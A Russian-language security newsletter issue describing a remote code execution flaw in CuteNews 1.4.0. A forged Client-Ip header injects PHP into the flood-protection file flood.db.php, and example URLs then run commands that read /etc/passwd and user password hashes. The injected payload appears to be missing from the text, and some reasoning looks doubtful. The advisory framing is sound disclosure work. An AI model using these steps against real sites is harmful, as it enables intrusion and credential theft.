Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
CuteNews
ПО: CuteNews
Версия: 1.4.0

Описание:
"CuteNews - мощная и легкая в использовании система управления новостями, которая использует обычные файлы и хранит их в базе данных. Она поддерживает комментарии, архивы, функции поиска, загрузку картинок, функции резервного копирования и восстановления, IP-бан, защиту от флуда..."
Уязвимость:
Уязвимость находится в коде защиты от флуда:
//----------------------------------
// Get the IP
//----------------------------------
$foundip = TRUE;
[!] if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP");
[!] else if(getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR");
else if(getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR");
else {$ip = "not detected"; $foundip = FALSE;}
[!] if( $foundip and !ip2long($ip) ){ $ip = "not detected"; $foundip = FALSE;} //ensure that what we have is a real IP [!]
...
Многие люди, я думаю, обычно не знают что такое HTTP_CLIENT_IP заголовок, но он позволяет вам очень просто устанавливать и отправлять различные пакеты, например:
POST /somescript.php HTTP/1.0
Client-Ip: 127.0.0.1
User-Agent: somebrowser
...
и так далее.
В этой строке:
...
if( $foundip and !ip2long($ip) ){ $ip = "not detected"; $foundip = FALSE;}
...
содержится полная белиберда, поскольку ip2long($ip) всегда будем true, а значит мы можем вставить PHP код в поле Client-Ip.
Защита от флуда обычно хранит информацию во временных файлах с расширением php, /data/flood.db.php обычно она выглядит так:
1126976551|127.0.0.1|1126966862|
Но мы можем это дело переписать:
1126976551||1126966862|
Вот теперь мы можем запускать команды в комментариях:
http://[цель]/[путь]/cute/data/flood.db.php?cmd=cat%20/etc/passwd
просматриваем /etc/passwd файлы
http://[цель]/[путь]/cute/data/flood.db.php?cmd=cat%20users.db.php
просматриваем любые хеши.
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться
Вспомнить пароль

В избранное